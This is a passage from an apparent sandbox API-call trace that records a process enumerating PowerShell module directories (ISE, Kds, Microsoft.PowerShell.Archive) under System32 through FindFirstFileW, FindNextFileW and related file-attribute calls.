ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.247] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.247] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0226.248] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0226.248] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0226.248] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.248] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0226.248] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0226.248] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.249] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.249] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0226.249] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0226.249] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.249] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.250] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0226.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.250] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.250] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0226.250] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0226.250] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.250] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.250] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psd1", cAlternateFileName="")) returned 1 [0226.251] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 1 [0226.251] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474, dwReserved0=0x0, dwReserved1=0x0, cFileName="ise.psm1", cAlternateFileName="")) returned 0 [0226.251] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.251] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0226.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.252] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0226.252] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0226.252] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf850 [0226.252] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.252] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.252] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0226.253] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0226.253] FindClose (in: hFindFile=0x1a5cf850 | out: hFindFile=0x1a5cf850) returned 1 [0226.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.253] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0226.253] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0226.253] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.253] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.254] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.254] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0226.254] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.254] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.254] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0226.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.254] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.255] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0226.255] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\", lpFilePart=0x0) returned 0x37 [0226.255] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.255] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.255] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.255] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0226.255] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0226.256] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.256] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20 [0226.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.256] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0226.256] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50 [0226.256] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.257] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.257] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, 